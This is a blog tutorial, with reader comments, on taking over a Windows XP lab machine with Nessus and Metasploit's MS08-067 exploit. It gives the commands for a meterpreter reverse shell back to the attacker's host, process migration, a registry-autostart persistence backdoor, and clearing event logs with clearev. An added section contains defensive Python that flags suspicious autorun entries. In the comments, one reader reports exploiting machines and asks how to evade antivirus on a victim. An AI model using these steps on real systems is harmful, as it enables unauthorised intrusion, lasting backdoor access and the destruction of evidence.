Holla Guys,
Let's do some exploitation. :D
1. Start up your XP in VirtualBox
(for those who haven't installed XP in VirtualBox, see the tutorial here)
2. Make sure that the host (BT 5r1) and the XP machine can reach each other.
# nmap -A 192.168.56.101
3. Scan the target with Nessus.
(for how to use Nessus you can go here)
After the scan has finished, let's analyze the report.
Great, it says that our target's SMB service is vulnerable and that the vulnerability level is high.
Pay attention to the plugin name and the CVE shown in the report, because we have to use them to search for the right exploit (or simply look at the plugin name in the report).
That plugin name is the hint to search for the right exploit.
4. Let's search for the exploit for that vulnerability in Metasploit. Start your Metasploit console.
# msfconsole
To search for the exploit, type
msf > search platform:windows type:exploit cve:-2008-4834 app:server path:exploit/windows/smb
explanation : for the search syntax type "search -h"
platform : because the target is a Windows system we choose this.
type : because we only want to search for an exploit, we choose exploit for this.
cve : fill in the data from the Nessus scan.
app : server attack side.
path : because we want to search only exploits for SMB, setting the path to this is right.
Hit enter.
Notice that there is this exploit, "ms08_067_netapi", located at exploit/windows/smb/ms08_067_netapi. It has the same name as the plugin name that we discovered with Nessus earlier. It is important to know that almost all unpatched Windows systems are vulnerable to this exploit. Let's use it.
5. Type these :
use exploit/windows/smb/ms08_067_netapi
explanation : by typing this we set Metasploit to use this exploit on the target.
set RHOST 192.168.56.101
explanation : RHOST is the target; set the IP to the target that you want to attack.
set PAYLOAD windows/meterpreter/reverse_tcp
explanation : meterpreter is the payload that we want to use. I'll explain more about payloads later.
set LHOST 192.168.56.1
explanation : LHOST is the Listener HOST. This is us; set it to our IP.
exploit
explanation : launches the attack.
6. If everything is done correctly, a meterpreter shell will appear on the target system.
7. From this point, the server is under our control. But to prevent the user from killing our meterpreter process we must quickly migrate to another running process.
To show the running processes on the target system type
meterpreter > ps
Search for the explorer.exe process, since it is the most important process on Windows, and identify its process number. Let's migrate to that process.
meterpreter > migrate [PID]
You can do whatever you want on the system now.
8. Ok, the next step is placing a backdoor for a later connection. Good for us, Metasploit also provides a script for it called "persistence". Let's see the usage of this script.
meterpreter > run persistence -h
Let's execute it.
meterpreter > run persistence -A -X -p 10000 -r 192.168.56.1
And that's it. A backdoor has been created on the target system.
(the backdoor will be located in the C:\WINDOWS\TEMP directory. It is a .vbs file. The script will also create an autostart entry in the registry key HKLM\Software\Microsoft\CurrentVersion\Run\XXXXX (random name). So, when the PC starts, the backdoor will also be active. For a tutorial on using the backdoor you can go here)
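From the defender's side, the artifacts this step leaves behind are exactly what an autorun audit should catch: a script file in a TEMP directory started from a Run key under a random name. The following example is added here and is not part of the original post; it parses a constructed "reg export" of the Run/RunOnce keys (it assumes the standard HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run path) and flags entries that launch a script from a temp directory or through wscript/cscript.

```python
import re

# Constructed sample of a .reg export of the HKLM autorun keys (not a real host dump).
# Entry 1 is a normal VirtualBox guest tool; entries 2 and 3 mimic the persistence pattern.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VBoxTray"="C:\\WINDOWS\\system32\\VBoxTray.exe"
"KdJxQpLmRt"="C:\\WINDOWS\\TEMP\\yHvBgTrE.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Updater"="wscript.exe \"C:\\DOCUME~1\\USER\\LOCALS~1\\Temp\\upd.vbs\""
'''

RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")
TEMP_DIRS = ("\\windows\\temp\\", "\\temp\\", "\\tmp\\")
SCRIPT_RE = re.compile(r'\.(vbs|js|bat|cmd|ps1)(["\s]|$)')
WSCRIPT_RE = re.compile(r'\b[wc]script(\.exe)?\b')


def parse_reg_export(text):
    """Yield (key, value_name, data) for every string value in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = re.match(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$', line)
            if m:
                # .reg files escape backslashes and quotes; undo that for matching.
                data = m.group(2).replace("\\\\", "\\").replace('\\"', '"')
                yield key, m.group(1), data


def suspicious_autoruns(text):
    """Return [(key, name, data, reasons)] for autorun entries worth a closer look."""
    findings = []
    for key, name, data in parse_reg_export(text):
        if not key.lower().endswith(RUN_KEYS):
            continue  # only Run / RunOnce keys are autorun locations here
        d = data.lower()
        reasons = []
        if any(t in d for t in TEMP_DIRS):
            reasons.append("launches from a temp directory")
        if SCRIPT_RE.search(d):
            reasons.append("launches a script file")
        if WSCRIPT_RE.search(d):
            reasons.append("uses the Windows Script Host")
        if reasons:
            findings.append((key, name, data, reasons))
    return findings
```

On a live XP host the same text is produced by `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` (saved as UTF-16, so decode it before parsing).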
9. And don't forget to clear our hacking tracks.
meterpreter > clearev
To exit the shell just type "exit".
Mapping this attack onto the hacking methodology:
1. Information Gathering
Using nmap to get the information.
2. Service Enumeration
Using nmap to see the services running.
3. Vulnerability Assessment
Using Nessus to scan for the vulnerability and Metasploit to search for the exploit.
4. Exploit
Using Metasploit in console mode to take over the system.
5. Backdooring
Using the Metasploit 'persistence' script to create a backdoor.
6. Housekeeping
Using Metasploit's 'clearev' to clear the tracks.
Hope this helps. :)
Let's make history!!
15 comments:
Cool!!! Don't forget to teach me about how to do that.
haha, lol.. you're more expert than me..
I am the one that needs your teaching.. :D
It's not working with a firewall and updated Windows.
yep, no doubt about that.. :)
Metasploit network security software,Thanks for sharing such an informative article.
Download Metasploit network security software
Hi, I've exploited some machines following your method. But now my victim has Kaspersky Internet Security installed on it and every time it reverts back with an error like,
"Connection reset by peers"
pls help me on this.
> Hardip Gajjar :
hmm... I think the main problem here is Kaspersky..
Wow It works
It was not working, if the system is protected by the firewall.
Thanks It Worked I Tested In My VM Windows XP SP2 With Firewall off..
I've got an XP SP3 machine with no updates installed and the meterpreter shell doesn't work.
Exploit completed, but no session was created.
any tips?
I've also got an XP SP3 machine with no updates and the meterpreter shell won't load based on the same error that @Josh had:
"Exploit completed, but no session was created."
Any thoughts on what to check or try? I have a virtual lab on my laptop and I'm able to run successful exploits against Linux VMs and also Metasploitable 2.
Hi, how do you shut down Metasploitable and boot up Windows XP?
How to port forward with NAT mode in VMware Workstation 14 Player?
The vmnetnat.conf file is missing.
VMware, running on Windows 7. Please help.
We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.